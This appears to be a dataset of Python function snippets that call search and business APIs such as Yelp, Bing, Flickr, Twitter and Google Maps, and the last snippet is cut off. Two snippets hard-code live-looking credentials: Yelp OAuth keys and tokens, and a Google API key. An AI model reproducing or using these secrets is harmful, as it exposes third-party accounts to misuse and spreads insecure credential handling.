"def query_api(term, location, search_limit):\n\n response = search(term, location, search_limit)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'\\nNo businesses for {} in {} found.\\n'.format(term, location))\n return\n\n business_id = businesses[0]['id']\n\n print(u'\\n{} businesses found, querying business info for the top result \"{}\" ...\\n'.\n format(len(businesses), business_id))\n\n biz_response = get_business(business_id)\n\n print(u'\\nResult for business \"{}\" found:\\n'.format(business_id))\n\n pprint.pprint(biz_response, indent=2)\n\n reviews_response = get_reviews(business_id)\n\n print(u'\\nReviews for business \"{}\" found:\\n'.format(business_id))\n\n pprint.pprint(reviews_response, indent=2)",
"def get_search_results(url_params):\n categories = url_params['categories']\n radius = url_params['radius']\n key = categories + '|' + radius\n\n # Check if data already in memory\n print 'Checking cached Yelp data.'\n data = YELP_API_RESULTS.get(key)\n if not data:\n print 'New search. Not cached yet.'\n YELP_API_RESULTS[key] = {}\n else:\n # Check that data has search results\n search_results_exist = data.get('search_results')\n print 'Search Results Exist: %s' % bool(search_results_exist)\n # Check that cache hasn't expired\n cache_valid = data.get('cache') > time.time()\n print 'Cache_valid: %s' % bool(cache_valid)\n\n # Boolean to determine if new search performed\n perform_new_search = not (data and search_results_exist and cache_valid)\n if perform_new_search:\n print 'Getting new Yelp data'\n YELP_API_RESULTS[key]['search_results'] = yelpapi.search(url_params)\n YELP_API_RESULTS[key]['cache'] = time.time() + CACHE_EXPIRATION\n\n time_to_expiration = YELP_API_RESULTS[key]['cache'] - time.time()\n print 'Time to cache expiration: %s' % (time_to_expiration)\n return YELP_API_RESULTS[key]['search_results']",
"def _search(self,\n limit=None,\n offset=None,\n format=None,\n version=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n if not version:\n version = self.version\n if version == 1:\n url = self.QUERY_URL.format(\n search_type='Web',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format='json')\n # Need to find the optimal procedure for this\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingWebException(\"[Error] Code:%s, Error:%s\" % (\n res.status_code,\n res.text))\n if version == 2:\n json_results = _bing_search_v2.search_api_v2_dict(search_text=self.query,\n api_key=self.api_key,\n offset=offset,\n limit=limit)\n json_results = json_results.get('d', list())\n if json_results:\n json_results = json_results.get('results', list())\n packaged_results = list()\n packaged_results = [make_dict(result=single_result_json)\n for single_result_json in json_results]\n return packaged_results",
"def getResults():",
"def search(self, name=None):\r\n params = base.get_params(('name', ), locals())\r\n request = http.Request('GET', self.get_url(), params)\r\n\r\n return request, parsers.parse_json",
"def search_yelp(params):\n url = 'https://api.yelp.com/v3/businesses/search'\n headers = {'Authorization': 'Bearer ' + os.environ['YELP_KEY']}\n resp = requests.get(url=url, params=params, headers=headers)\n responses = resp.json()\n return responses",
"def get(self):\n\n self.counter = count(1)\n arguments = {}\n for arg_name in ('term', 'page', 'page_width', 'callback'):\n arg_value = self.get_argument(arg_name, None, True)\n if arg_value is not None:\n arguments[arg_name] = arg_value.encode('utf-8')\n\n self.jsonp_callback = arguments.pop('callback', None)\n\n if 'term' not in arguments:\n return self._empty_answer()\n arguments['term'] = self._clean_term(arguments['term'])\n if not arguments['term']:\n return self._empty_answer()\n\n http_client = AsyncHTTPClient()\n url = \"{0}/{1}/?{2}\"\n for search_type in self.response.keys():\n request = HTTPRequest(\n url.format(self.api_url, search_type, urlencode(arguments)),\n method='GET',\n request_timeout=3,\n )\n http_client.fetch(\n request,\n callback=partial(self._handle_request, search_type)\n )",
"def get_results():\n # store info in a dictionary {name -> shortname}\n res = {}\n session = requests.Session()\n handle_url('http://www.gocomics.com/features', session, res)\n handle_url('http://www.gocomics.com/explore/editorial_list', session, res)\n handle_url('http://www.gocomics.com/explore/sherpa_list', session, res)\n save_result(res, json_file)",
"def search(self, query, offset):\n \n def parse_flickr_json(site, query, results):\n \"\"\"Create a OpenSearch Response from Flickr results.\n \n Flickr's search API returns results in JSON format. This function simply loads the JSON into memory and creates an equivalent representation that is OpenSearch compliant.\n \n Parameters:\n \n * site (str): search engine name\n * query (str): query search terms (n.b. not a OpenSearch Query object)\n * results (dict): results from service\n \n Returns:\n \n * puppy.model.OpenSearch.Response\n \n \"\"\"\n response = Response()\n response.version = 'json'\n response.feed.setdefault('title', \"{0}: {1}\".format(site, query))\n response.feed.setdefault('link', results['link'])\n response.feed.setdefault('description', \"Search results for '{0}' at {1}\".format(query, site))\n response.namespaces.setdefault(\"opensearch\", \"http://a9.com/-/spec/opensearch/1.1/\")\n try:\n response.feed.setdefault(\"opensearch_totalresults\", int(results['total']))\n response.feed.setdefault(\"opensearch_itemsperpage\", int(results['perpage']))\n response.feed.setdefault(\"opensearch_startindex\", int(results['page']))\n except KeyError:\n response.feed.setdefault(\"opensearch_totalresults\", 0)\n response.feed.setdefault(\"opensearch_itemsperpage\", 0)\n response.feed.setdefault(\"opensearch_startindex\", 0)\n \n if 'photo' in results:\n for result in results['photo']:\n # Links need to be created from several fields - see the Flickr API for a detailed explanation\n \n try:\n resultLink = \"http://www.flickr.com/photos/{0}/{1}\".format(result['owner'], result['id'])\n resultThumbnail = \"http://farm{0}.static.flickr.com/{1}/{2}_{3}_t.jpg\".format(result['farm'], result['server'], result['id'], result['secret'])\n resultSummary = \"Photo result for '{0}' from {1}\".format(query, site)\n response.entries.append({'title': result['title'], 'link': resultLink, 'summary': resultSummary, 'thumbnail': resultThumbnail})\n except Exception, e:\n print \"Skipping a result due to: {0} \\nWhen parsing a result from: {1}\\n\".format(e, results['link'])\n continue\n \n return response\n\n\t# Try and get the API key from config, if it's not there raise an API Key error - the application will have to deal with this\n try:\n appId = self.service.config[\"flickr_api_key\"]\n except KeyError:\n raise ApiKeyError(\"Flickr\", \"flickr_api_key\")\n\n # Now that an API key has been supplied try to get results from the search engine itself\n try: \n pos = self._origin() + offset\n appId = self.service.config[\"flickr_api_key\"]\n url = \"http://api.flickr.com/services/rest/?method=flickr.photos.search&api_key={0}&text={1}&sort={2}&safe_search={3}&media={4}&per_page={5}&page={6}&format=json&nojsoncallback=1\".format(appId, urllib2.quote(query.search_terms), self.sortBy, self.safeSearch, self.mediaType, self.resultsPerPage, pos)\n \n if (self.bbox):\n url += \"&bbox={0}\".format(self.bbox) \n data = urllib2.urlopen(url).read()\n results = json.loads(data)\n results['photos'].setdefault(u'link', url)\n return parse_flickr_json('Flickr', query.search_terms, results['photos'])\n\n # urllib2 - this catches http errors due to the service being down, lack of a proxy etc\n except urllib2.URLError, e:\n raise SearchEngineError(\"Flickr\", e, errorType = 'urllib2', url = url)\n\n # Check for a type error for offset or resultsPerPage\n except TypeError, e:\n note = \"Please ensure that 'offset' and 'resultsPerPage' are integers if used\"\n if isinstance(offset, int) == False:\n raise SearchEngineError(\"Flickr\", e, note = note, offsetType = type(offset))\n\n if isinstance(self.resultsPerPage, int) == False:\n raise SearchEngineError(\"Flickr\", e, note = note, resultsPerPageType = type(self.resultsPerPage))\n\n raise SearchEngineError(\"Flickr\", e, note = note)\n\t \n # Catch Attribute error which deals with unexpected none type for the objects the wrapper uses and other associated issues\n except AttributeError, e:\n raise SearchEngineError(\"Flickr\", e, url = url)",
"def fetch(self, **kwargs):\n api_seid = self.engine_info['GOOGLE_SITE_SEARCH_SEID']\n page = kwargs.get('page', 1)\n if not page:\n page = 1\n elif page > self.max_pages:\n page = self.max_pages\n start = ((page - 1) * self.max_results_per_page) + 1\n num = kwargs.get('num', self.max_results_per_page)\n if not num:\n num = self.max_results_per_page\n try:\n response = self.connection.cse().list(\n q=kwargs.get('query', ''), cx=api_seid,\n num=self._get_num_results(num),\n start=start).execute()\n logger.debug(\"Fetched search results for search term '%s'.\" % (kwargs.get('query', '')))\n except apiclient.errors.HttpError as e:\n logger.exception(e)\n raise\n return response",
"def api_connect(self, params):\n\t\tconsumer_key = \"XwD3f3Yoe2GcjqXSd5kRkA\"\n\t\tconsumer_secret = \"VtZMCNmBNEardBkIXo-RU7De-wU\"\n\t\ttoken = \"JymbFW3SgkWemf6aTEHUvsNoPg9Nh7hZ\"\n\t\ttoken_secret = \"S4XUSKiIcUCYnlC3q7FYgUC47co\"\n\t\t\n\t\tsession = rauth.OAuth1Session(consumer_key = consumer_key,\n\t\tconsumer_secret = consumer_secret,\n\t\taccess_token = token,\n\t\taccess_token_secret = token_secret,\n\t\t)\n\t\t\n\t\trequest = session.get(\"http://api.yelp.com/v2/search\",params=params)\n\t\t\n\t\tdata = request.json()\n\t\tsession.close()\n\t\t\n\t\treturn data",
"def get(self, search_words, language, result_type):\n consumer_key = config.twitter_api_credentials[\"consumer_key\"]\n consumer_secret = config.twitter_api_credentials[\"consumer_secret\"]\n access_token = config.twitter_api_credentials[\"access_token\"]\n access_token_secret = config.twitter_api_credentials[\"access_token_secret\"] \n \n auth = tweepy.OAuthHandler(consumer_key, consumer_secret); \n auth.set_access_token(access_token, access_token_secret);\n api = tweepy.API(auth, wait_on_rate_limit=True) ; \n \n #input_params = ns.payload\n #search_words = input_params['search_words'] \n #language = input_params['language'] # Language code (follows ISO 639-1 standards)\n #until_date = input_params['until_date']\n #result_type = input_params['result_type'] until=until_date\n\n try:\n results = tweepy.Cursor( api.search, q=search_words, lang=language, result_type = result_type).items(10) \n out = { tweet.user.screen_name: { \"followers_count\": tweet.user.followers_count, \\\n \"location\": tweet.user.location ,\"favorite_count\":tweet.favorite_count,\"text\": tweet.text} for tweet in results }\n sorted_keys = {k:v[\"followers_count\"] for (k,v) in out.items()}\n sorted_keys = sorted(sorted_keys, key=sorted_keys.__getitem__, reverse=True)\n out = {k:out[k] for k in sorted_keys}\n return out\n except tweepy.error.TweepError as e:\n return(json.loads(e.response.text)['errors'][0]['message'], 401)",
"def get_query_results(QueryExecutionId=None, NextToken=None, MaxResults=None):\n pass",
"def query_api(term, location):\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n\n response = search(bearer_token, term, location)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n\n business_id = businesses[0]['id']\n\n print(u'{0} businesses found, querying business info ' \\\n 'for the top result \"{1}\" ...'.format(\n len(businesses), business_id))\n response = get_business(bearer_token, business_id)\n\n print(u'Result for business \"{0}\" found:'.format(business_id))\n pprint.pprint(response, indent=2)\n dict_list = []\n for i in response:\n dict_list.append(i)\n print dict_list",
"def search(self, query, maxhits=100):",
"def execute_search(locations, distance, query):\n full_business_list = []\n for engine in [google, yelp]:\n businesses = []\n for lat, lng in locations:\n businesses.extend(engine.search(lat, lng, distance, query))\n # Remove duplicates from API call overlap\n names = set()\n filtered_list = []\n print(time.strftime(\"%Y/%m/%d at %H:%M:%S \") + engine.__name__ + \" \" + str(len(businesses)))\n for business in businesses:\n if business:\n filtered_list.append(business)\n names.add(business.name)\n businesses = filtered_list\n # Calculate low threshold and average ratings\n try:\n low_threshold = min(\n business.rating_count for business in businesses)\n except:\n # go to next item\n continue\n average_rating = sum(\n business.rating for business in businesses) / len(businesses)\n # Convert to 10 point scale\n scale_multiplier = 2\n # Add bayesian estimates to business objects\n for business in businesses:\n business.bayesian = bayesian(business.rating * scale_multiplier,\n business.rating_count,\n low_threshold,\n average_rating * scale_multiplier)\n\n # Add this search engine's list to full business list\n full_business_list.extend(businesses)\n\n return full_business_list",
"def search_unified():\n result_types = flask.request.args.get('result_types').split(',')\n\n # TODO(david): Cache this.\n course_dicts = []\n if 'courses' in result_types:\n courses = sorted(list(m.Course.objects().only('id', 'name',\n '_keywords', 'department_id', 'number')),\n key=lambda c: c.id)\n course_dicts = [{\n 'label': c.id,\n 'name': c.name,\n 'type': 'course',\n 'tokens': c._keywords,\n 'department_id': c.department_id,\n 'number': c.number\n } for c in courses]\n\n friend_dicts = []\n if 'friends' in result_types:\n user = view_helpers.get_current_user()\n if user:\n friends = user.get_friends()\n friend_dicts = [{\n 'label': f.name,\n 'program': f.short_program_name,\n 'type': 'friend',\n 'id': f.id,\n 'pic': f.profile_pic_urls['square'],\n 'tokens': [f.first_name, f.last_name]\n } for f in friends]\n\n prof_dicts = []\n if 'professors' in result_types:\n professors = m.Professor.objects().only('id',\n 'first_name',\n 'last_name',\n 'departments_taught')\n prof_dicts = [{\n 'label': p.name,\n 'departments_taught': p.departments_taught,\n 'type': 'prof',\n 'prof_id': p.id,\n 'name': p.name,\n 'tokens': [p.first_name, p.last_name, 'professor']\n } for p in professors]\n\n return api_util.jsonify({\n 'friends': friend_dicts,\n 'courses': course_dicts,\n 'professors': prof_dicts\n })",
"def query_api(term, location):\n bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n\n response = search(bearer_token, term, location)\n\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n final_result=''\n for i in businesses:\n business_id = i['id']\n # print(u'{0} businesses found, querying business info ' \\\n # 'for the top result \"{1}\" ...'.format(\n # len(businesses), business_id))\n response =get_business(bearer_token, business_id)\n \n\n # print(u'Result for business \"{0}\" found:'.format(business_id))\n return ','.join([str(x['id']) for x in businesses])",
"def processSearchResult(self):",
"def get_apis(self, MaxResults: str = None, NextToken: str = None) -> Dict:\n pass",
"def run_query(search_terms):\n bing_api_key = read_bing_key()\n\n if not bing_api_key:\n raise KeyError(\"Bing Key Not Found\")\n\n # Specify the base url and the service (Bing Search API 2.0)\n root_url = 'https://api.bing.microsoft.com/v7.0/search'\n #search_url = \"https://api.bing.microsoft.com/v7.0/search\"\n service = 'Web'\n\n # Specify how many results we wish to be returned per page.\n # Offset specifies where in the results list to start from.\n # With results_per_page = 10 and offset = 11, this would start from page 2.\n results_per_page = 10\n offset = 0\n\n # Wrap quotes around our query terms as required by the Bing API.\n # The query we will then use is stored within variable query.\n query = \"'{0}'\".format(search_terms)\n\n # Turn the query into an HTML encoded string, using urllib.\n # Use the line relevant to your version of Python.\n query = urllib.parse.quote(query) # Py3\n\n # Construct the latter part of our request's URL.\n # Sets the format of the response to JSON and sets other properties.\n #search_url = \"{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}\".format(root_url, service, results_per_page,offset,query)\n\n headers = {\"Ocp-Apim-Subscription-Key\": bing_api_key}\n params = {\"q\": search_terms, \"textDecorations\": True, \"textFormat\": \"HTML\", \"count\": results_per_page, \"offset\": offset}\n response = requests.get(root_url, headers=headers, params=params)\n response.raise_for_status()\n search_results = response.json()\n\n output_results = []\n keys = [\"webPages\", \"images\", \"videos\"]\n url = {\"webPages\": \"url\", \"images\": \"hostPageUrl\", \"videos\": \"hostPageUrl\"}\n summary = {\"webPages\": \"snippet\", \"images\": \"\", \"videos\": \"description\"}\n for key in keys:\n if key in search_results.keys():\n for result in search_results[key][\"value\"]:\n if key != \"images\":\n output_results.append({\"category\": key, \"title\": result[\"name\"], \"link\": result[url[key]], \"summary\": result[summary[key]]})\n else:\n output_results.append({\"category\": key, \"title\": result[\"name\"], \"link\": result[url[key]], \"summary\": \"None\"})\n return output_results",
"def search_for_books(search_criteria, product_url, headers):\n\tprint \"od api in search_for_books \"\n\tlist_of_books = []\n\tlist_book = []\n\tq = search_criteria\n\tlimit = 300\t\t# 25 by default 300 max\n\toffset = 0\t\t# number of titles to skip\n\tformats = \"\"\n\tsort = \"Author:desc\" \t\t# :desc\n\tlastupdatetime = \"\" \n\tseries = \"\" \n\tsearch_parms = \"?q=%s&limit=%s&offset=0&formats=%s&sort=%s\" % (q, limit, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t formats, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t sort)\n\tod_url=\"%s%s\" % (product_url, search_parms)\n\n\tprint \"overdrive url = \", od_url, \"\\n\"\n\tod_url = od_url.replace(' ', '%20')\n\tbook_response = requests.get(od_url, headers=headers)\n\n\tprint \"book search response == \", book_response, \"reason = \", book_response.reason, \"\\n\"\n\tif book_response.status_code == 401:\n\t print \"Patron is not authorize to use this library == \", od_url, \"\\n\"\n\telif book_response.status_code > 201:\n\t\tprint \"Get request failed == \", book_response.reason\n\telif book_response.status_code == 200 or book_response.status_code == 201:\n\t\tprint \"Get request to get the a list of books was successful\", \"\\n\"\n\n\t\tbook_response_data = json.loads(book_response.content)\n\t\tprint \"OverDrive book count == \", book_response_data['totalItems'], \"\\n\"\n\n\t\tif book_response_data['totalItems'] > 0:\n\t\t\tproducts = book_response_data['products']\n\t\t\tfor product in products:\n\t\t\t\tbook_data = {}\t\n\t\t\t\tbook_data['images'] = product['images']['thumbnail']['href']\n\t\t\t\tbook_data['title'] = product['title']\n\t\t\t\tbook_data['author'] = product['primaryCreator']['name']\n\t\t\t\tbook_data['availableToDownload'] = product['links']['availability']['href']\n\t\t\t\tbook_data['id'] = product['id']\n\t\t\t\tbook_data['metadata'] = product['links']['metadata']['href']\n\t\t\t\tbook_data['origin'] = 'ODCOM'\n\t\t\t\tlist_book = [book_data]\n\t\t\t\tlist_of_books.extend(list_book)\n\t\t\t#end for\n\t\t#end if\n\t#end if\n\n\treturn list_of_books",
"def search():\n\n question = request.get_json()\n question = question['questions']\n\n prediction = pipe.run(query=question[0], top_k_retriever=3, top_k_reader=3)\n answer = []\n \n for res in prediction['answers']:\n answer.append(res['answer'])\n\n result = {\"results\":[prediction]}\n return json.dumps(result)",
"def get_results():\n # store info in a dictionary {name -> shortname}\n res = {}\n session = requests.Session()\n handle_url('http://www.creators.com/comics/cat-seeall.html', session, res)\n save_result(res, json_file)",
"def perform_search(search: str, max_records: int) -> List[str]:\n results = []\n url = \"%s?format=json&action=query&list=search&srlimit=%d&srsearch=%s\" % (WIKIDATA_URL, max_records, quote(search))\n # Perform request\n print_debug(\"Sending GET %s\" % url)\n response = requests.get(url)\n data = response.json()\n print_debug(\"%s -> %d\" % (url, response.status_code))\n print_debug(\"%s\" % response.text)\n # Get search results\n records = data[\"query\"][\"search\"]\n # Iterate over records\n for record in records:\n results.append(record[\"title\"])\n return results",
"def search(bearer_token, term, location):\n\n url_params = {\n 'term': term.replace(' ', '+'),\n 'location': location.replace(' ', '+'),\n 'limit': SEARCH_LIMIT\n }\n return request_from_yelp(API_HOST, SEARCH_PATH, bearer_token, url_params=url_params)",
"def search_api():\n query = request.args.get(\"url\", \"\", type=str)\n return_html = str_to_bool(request.args.get(\"result\", \"false\", type=str))\n show_stats = str_to_bool(request.args.get(\"stats\", \"false\", type=str))\n info = str_to_bool(request.args.get(\"info\", \"true\", type=str))\n check_all = str_to_bool(request.args.get(\"checkall\", \"false\", type=str))\n favicon = str_to_bool(request.args.get(\"favicon\", \"false\", type=str))\n return_opml = str_to_bool(request.args.get(\"opml\", \"false\", type=str))\n force_crawl = str_to_bool(request.args.get(\"force\", \"false\", type=str))\n check_feedly = str_to_bool(request.args.get(\"feedly\", \"true\", type=str))\n skip_crawl = str_to_bool(request.args.get(\"skip_crawl\", \"false\", type=str))\n\n g.return_html = return_html\n\n url: URL = validate_query(query)\n\n start_time = time.perf_counter()\n\n search_runner = SearchRunner(\n db_client=db_client,\n check_feedly=check_feedly,\n force_crawl=force_crawl,\n check_all=check_all,\n skip_crawl=skip_crawl,\n )\n feed_list: List[CustomFeedInfo] = search_runner.run_search(url)\n stats = search_runner.crawl_stats\n\n search_time = int((time.perf_counter() - start_time) * 1000)\n stats[\"search_time\"] = search_time\n app.logger.info(\"Ran search of %s in %dms\", url, search_time)\n\n if not feed_list and no_response_from_crawl(stats):\n raise NotFoundError(f\"No Response from URL: {url}\")\n\n result: Dict = {}\n if feed_list:\n try:\n kwargs = {}\n if not info:\n kwargs[\"only\"] = [\"url\"]\n if not favicon:\n kwargs[\"exclude\"] = [\"favicon_data_uri\"]\n\n feed_schema = ExternalFeedInfoSchema(many=True, **kwargs)\n\n feed_list = sorted(feed_list, key=lambda x: x.score, reverse=True)\n dump_start = time.perf_counter()\n result = feed_schema.dump(feed_list)\n dump_duration = int((time.perf_counter() - dump_start) * 1000)\n app.logger.debug(\n \"Schema dump: feeds=%d duration=%dms\", len(result), dump_duration\n )\n stats[\"dump_time\"] = dump_duration\n except ValidationError as err:\n app.logger.warning(\"Dump errors: %s\", err.messages)\n abort(500)\n\n if show_stats:\n result = {\"feeds\": result, \"search_time_ms\": search_time, \"crawl_stats\": stats}\n\n if return_html:\n return render_template(\n \"results.html\",\n feeds=feed_list,\n json=get_pretty_print(result),\n url=url,\n stats=get_pretty_print(stats),\n )\n elif return_opml:\n opml_result = output_opml(feed_list).decode(\"utf-8\")\n return Response(opml_result, mimetype=\"text/xml\")\n\n return jsonify(result)",
"def query_api(term, location, RADIUS_SIZE, RESTRICTED):\n response = search(API_KEY, term, location, 0, RADIUS_SIZE)\n businesses = response.get('businesses')\n\n if not businesses:\n print(u'No businesses for {0} in {1} found.'.format(term, location))\n return\n numFound = 0\n while len(businesses) >= 50 + numFound:\n numFound += 50\n response = search(API_KEY, term, location, numFound, RADIUS_SIZE)\n more_businesses = response.get('businesses')\n if more_businesses is not None:\n businesses.extend(more_businesses)\n\n names = []\n contacts = []\n addresses = []\n urls = []\n categories = []\n city = []\n state = []\n zipcode = []\n radius = []\n #Create a list from the names\n #Cross reference with restricted and delete elements that are matching\n for i in range(0, len(businesses)):\n not_matched = True\n for j in range (0, len(RESTRICTED)):\n if(businesses[i]['name'] == RESTRICTED[j].strip('\\n')):\n not_matched = False\n if(not_matched and (businesses[i]['distance']) < RADIUS_SIZE):\n names.append(businesses[i]['name'])\n radius.append(businesses[i]['distance'] / 1600)\n contacts.append(businesses[i]['display_phone'])\n addresses.append(businesses[i]['location']['address1'])\n city.append(businesses[i]['location']['city'])\n state.append(businesses[i]['location']['state'])\n zipcode.append(businesses[i]['location']['zip_code'])\n categories.append(businesses[i]['categories'][0]['title'])\n urls.append(businesses[i]['url'])\n list_restaurants = open('target_restaurants.txt', 'w')\n for x in range(0, len(names)):\n try:\n list_restaurants.write(\"%s\\t\" % names[x])\n list_restaurants.write(\"%s\\t\" % contacts[x])\n list_restaurants.write(\"%s\\t\" % radius[x])\n list_restaurants.write(\"%s\\t\" % addresses[x])\n list_restaurants.write(\"%s\\t\" % city[x])\n list_restaurants.write(\"%s\\t\" % state[x])\n list_restaurants.write(\"%s\\t\" % zipcode[x])\n list_restaurants.write(\"%s\\t\" % categories[x])\n list_restaurants.write(\"%s\\n\" % urls[x])\n except UnicodeEncodeError:\n continue\n\n print(\"Businesses found and printed to target_restaurants.txt file\")",
"def query_and_fetch(query, top_n=12):\n global url_details, url_text\n print('Query: ' + query + '; Top N: ' + str(top_n))\n url_details = []\n url_text = []\n driver = None\n bad_request = False\n try:\n driver = Fetcher.get_selenium_driver()\n driver.get('https://api.duckduckgo.com/?q=' + query + '&kl=wt-wt')\n except:\n print('An error occurred while searching query: ' + query)\n Fetcher.close_selenium_driver(driver)\n Fetcher.search_driver = None\n bad_request = True\n finally:\n try:\n if not bad_request:\n results = driver.find_elements_by_class_name('result__a')\n result_size = len(results)\n print('Result Size: ' + str(result_size))\n while result_size > 0 and len(url_details) < top_n:\n urls = []\n for element in results:\n new_url = element.get_attribute('href')\n # TODO: Filter URLs if required\n print(new_url)\n urls.append(new_url)\n\n fetched_result = Fetcher.fetch_multiple(urls, top_n)\n\n for fetched_data in fetched_result:\n if not fetched_data[1] or len(fetched_data[1].strip()) == 0:\n continue\n details = dict()\n details['url'] = fetched_data[0]\n details['html'] = fetched_data[1]\n details['title'] = fetched_data[2]\n details['label'] = predict(fetched_data[3])\n url_details.append(details)\n url_text.append(fetched_data[3])\n if len(url_details) == top_n:\n break\n\n # Infinite Scroll\n if len(url_details) < top_n:\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n results = driver.find_elements_by_class_name('result__a')\n results = results[result_size:]\n result_size = len(results)\n print('Moved to Next Page. Result Size: ' + str(result_size))\n except:\n print('An error occurred while searching query: '+ query + ' and fetching results')\n #finally:\n # if driver is not None:\n # Fetcher.close_selenium_driver(driver)\n setattr(flask.current_app, 'url_text', url_text)\n print('Search Completed')\n return url_details",
"def _search(self,\n limit=None,\n offset=None,\n format=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n url = self.QUERY_URL.format(\n search_type='Video',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format=format)\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingVideoException(\"Code:%s, Error: %s\" % (res.status_code,\n res.text))\n json_results = json_results.get('d', None)\n if json_results:\n json_results = json_results.get('results', None)\n packaged_results = [VideoResult(single_result_json)\n for single_result_json in json_results]\n self.offset += len(packaged_results)\n return packaged_results",
"def suggest(self, name, query, count=SUGGESTION_COUNT, params=None):\n url = f\"{self.suggestions_url}/suggestions/api/4_1/rs/suggest/{name}\"\n data = {\"query\": query, \"count\": count}\n if params:\n data.update(params)\n response = self._post(url, data)\n return response[\"suggestions\"]",
"def get_google_results(api_id, address, return_response_fields=None):\n # set up api key\n api_key = \"AIzaSyDQaVh67imEZW2FLH7hb33SB63jv2shkqQ\"\n request_url = \"\"\n outputs = []\n building = address[0]\n address1 = address[0] + \" \" + address[1] + \" \" + address[2]\n if api_id == \"geocoding\":\n request_url = \"https://maps.googleapis.com/maps/api/geocode/json?address={}\".format(\n address1) + \"&key={}\".format(\n api_key)\n print(\"GEOCODING |||||||||| \" + request_url)\n if api_id == \"nearbysearch\":\n lat_long = get_google_results(\"geocoding\", address, return_response_fields=\"latitude\")[0][\n \"latitude\"].__str__() + \",\" + \\\n get_google_results(\"geocoding\", address, return_response_fields=\"longitude\")[0][\n \"longitude\"].__str__()\n request_url = \"https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={}\".format(\n lat_long) + \"&rankby=distance&type=establishment&key={}\".format(api_key)\n print(\"NEARBYSEARCH |||||||||| \" + request_url)\n results = requests.get(request_url)\n results = results.json()\n\n if len(results['results']) == 0:\n return False\n else:\n for answer in results['results']:\n if api_id == \"geocoding\":\n\n street_number = \"0\"\n for y in answer.get('address_components'):\n if 'street_number' in y.get('types'): street_number = y['long_name']\n\n route_name = \"0\"\n for z in answer.get('address_components'):\n if 'route' in z.get('types'): route_name = z['long_name']\n\n output = {\n \"entry\": building,\n \"street_number\": street_number,\n \"route_name\": route_name,\n \"latitude\": answer.get('geometry').get('location').get('lat'),\n \"longitude\": answer.get('geometry').get('location').get('lng'),\n \"google_place_id\": answer.get(\"place_id\"),\n \"type\": \",\".join(answer.get('types')),\n \"postcode\": \",\".join(\n [x['long_name'] for x in answer.get('address_components') if 'postal_code' in x.get('types')]),\n\n }\n if (output[\"route_name\"]) == \"0\":\n output[\"route_name\"] = answer.get('formatted_address')\n if (output[\"street_number\"]) == \"0\":\n\n pattern = re.compile(\"^(.+?),\")\n pattern0 = re.compile(\",(.+?),\")\n patterns = [pattern, pattern0]\n for pat in patterns:\n if pat.search(answer.get('formatted_address')):\n\n ad = re.findall(pat, answer.get('formatted_address'))[0]\n pattern1 = re.compile(\"\\d+\")\n if pattern1.search(ad):\n ad1 = re.findall(pattern1, ad)[0]\n if len(ad1) < 4: output[\"street_number\"] = ad1\n\n outputs += [output]\n\n if api_id == \"nearbysearch\":\n street_number = \"0\"\n route_name = answer.get('vicinity')\n if answer.get('rating') is None:\n rating = 0\n else:\n rating = int(answer.get('rating'))\n\n output = {'input_string': address1, \"street_number\": street_number, \"route_name\": route_name,\n \"google_place_id\": answer.get(\"place_id\"), \"type\": \",\".join(answer.get('types')),\n \"rating\": rating}\n\n pattern = re.compile(\"^(.+?),\")\n pattern0 = re.compile(\",(.+?),\")\n patterns = [pattern, pattern0]\n for pat in patterns:\n if pat.search(route_name):\n\n ad = re.findall(pat, answer.get('vicinity'))[0]\n pattern1 = re.compile(\"\\d+\")\n if pattern1.search(ad):\n ad1 = re.findall(pattern1, ad)[0]\n if len(ad1) < 4: output[\"street_number\"] = ad1\n\n if output[\"street_number\"] == address[0]:\n outputs += [output]\n\n if return_response_fields is None and len(outputs) > 0:\n return outputs\n elif (len(outputs) > 0) and (return_response_fields is not None):\n output_filter = []\n for item in outputs:\n output_filter += [{\"\" + return_response_fields: item[return_response_fields]}]\n outputs = output_filter\n return outputs\n else:\n return False",
"def search_for_adaptation():\n\n book_id = 0\n # variables for status results; 0 for no error, 1 for no book found, 2 for no movie found,\n # 3 for no tv show found, 4 for no tv show and movie found\n status_msg = \"\"\n status_num = 0\n\n # if the Random Book button is chosen, then select a random book from the list\n # try to match the book with a movie or tv show until one is found\n if request.args.get('random') == \"1\":\n search_term = data_functions.get_random_book()\n else:\n # if search input is used, then get the search term\n search_term = request.form['search'] # get search term from input box\n\n # Goodreads API functions\n gr_result = API_functions.request_book(search_term) # use function in API_functions.py\n\n # if no book is found, generate status code\n if gr_result[\"total\"] == 0:\n status_msg = \"No matching book found for {0}. Try another.\".format(search_term)\n status_num = 1\n\n # TheMovieDB functions\n movie_result = {} # empty dictionary\n tv_result = {} # empty dictionary\n if status_num == 0: # only continue if there is a book found\n # search for movie\n # use function in API_functions.py\n movie_result = API_functions.request_movie(gr_result[\"name_split\"], gr_result[\"author_name_clean\"], 0)\n\n if movie_result[\"total_results\"] != 0: # if a movie is found, save some of its data\n movie_id = movie_result[\"id\"] # save movie ID\n\n else: # if no movie is found, generate status message\n status_msg = \"No movie found. Try another.\"\n status_num = 2\n\n # search for TV show\n # use function in API_functions.py\n tv_result = API_functions.request_tv_show(gr_result[\"name_split\"], gr_result[\"author_name_clean\"], 0)\n\n if tv_result[\"total_results\"] != 0: # if a tv show is found, save some of its data\n tv_id = tv_result[\"id\"] # save tv ID\n\n else: # if no tv 